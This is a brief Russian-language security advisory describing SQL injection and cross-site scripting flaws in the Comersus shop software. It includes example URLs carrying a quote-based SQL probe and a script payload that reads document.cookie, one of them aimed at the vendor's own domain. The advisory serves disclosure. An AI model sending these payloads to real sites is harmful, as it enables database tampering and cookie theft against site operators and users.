Программа: Comersus

Обнаруженные уязвимости позволяют
удаленному пользователю произвести XSS
нападение и выполнить произвольные SQL
команды в базе данных приложения.

1. SQL-инъекция возможна при обработке
входных данных в параметрах email, idProduct, name и
message. Удаленный пользователь может с
помощью специально сформированного URL
выполнить произвольные SQL команды в базе
данных приложения.

Пример:

http://[target]/comersus6/store/comersus_optAffiliate
RegistrationExec.asp?name=1&email='&Submit= Join%20now%21

http://[target]/comersus6/store/comersus_optReview ReadExec.asp?idProduct='&description=Dr%252E%2
BSolomon%2560s%2BVirex%2B6%252E0%2 B%25 28For%2BMa

2. Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.

Пример:

www.comersus.com/backofficetest/backOfficePlus/
comersus_backoffice_listAssignedPricesToCustomer.asp? idCustomer=7&name=><script>alert(document.cookie);
</script>

http://[target]/backofficetest/backOfficePlus/
comersus_backoffice_message.asp?message=> <script >alert(document.cookie);</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии